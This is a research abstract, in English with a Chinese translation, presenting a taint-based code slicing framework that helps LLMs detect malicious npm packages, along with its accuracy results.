基于污点分析的代码切片用于基于LLM的恶意NPM包检测 (Taint-Based Code Slicing for LLMs-based Malicious NPM Package Detection)

Software supply chain attacks targeting the npm ecosystem have become increasingly sophisticated, leveraging obfuscation and complex logic to evade traditional detection mechanisms. Recently, large language models (LLMs) have attracted significant attention for malicious code detection due to their strong capabilities in semantic code understanding. However, the practical deployment of LLMs in this domain is severely constrained by limited context windows and high computational costs. Naive approaches, such as token-based code splitting, often fragment semantic context, leading to degraded detection performance. To overcome these challenges, this paper introduces a novel LLM-based framework for malicious npm package detection that leverages code slicing techniques. A specialized taint-based slicing method tailored to the JavaScript ecosystem is proposed to recover malicious data flows. By isolating security-relevant logic from benign boilerplate code, the approach reduces the input code volume by over 99\% while preserving critical malicious behaviors. The framework is evaluated on a curated dataset comprising over \num{7000} malicious and benign npm packages. Experimental results using the DeepSeek-Coder-6.7B model demonstrate that the proposed approach achieves a detection accuracy of \num{87.04}\%, significantly outperforming a full-package baseline based on naive token splitting (\num{75.41}\%). These results indicate that semantically optimized input representations via code slicing not only mitigate the LLM context window bottleneck but also enhance reasoning precision for security analysis, providing an effective defense against evolving open-source software supply chain threats.

翻译：针对npm生态系统的软件供应链攻击日益复杂，利用混淆和复杂逻辑来规避传统检测机制。近年来，大型语言模型（LLMs）凭借其强大的语义代码理解能力，在恶意代码检测领域引起了广泛关注。然而，LLMs在该领域的实际部署受到有限上下文窗口和高计算成本的严重制约。诸如基于令牌的代码分割等简单方法，往往会割裂语义上下文，导致检测性能下降。为克服这些挑战，本文提出了一种基于LLM的新型恶意npm包检测框架，该框架利用了代码切片技术。我们提出了一种专门针对JavaScript生态系统定制的基于污点分析的切片方法，以恢复恶意数据流。通过将安全相关逻辑与良性样板代码隔离，该方法将输入代码量减少了超过99%，同时保留了关键的恶意行为。该框架在一个包含超过7000个恶意和良性npm包的精选数据集上进行了评估。使用DeepSeek-Coder-6.7B模型的实验结果表明，所提方法的检测准确率达到87.04%，显著优于基于简单令牌分割的完整包基线方法（75.41%）。这些结果表明，通过代码切片实现的语义优化输入表示，不仅缓解了LLM上下文窗口的瓶颈，而且提高了安全分析推理的精确度，为应对不断演进的开源软件供应链威胁提供了有效防御。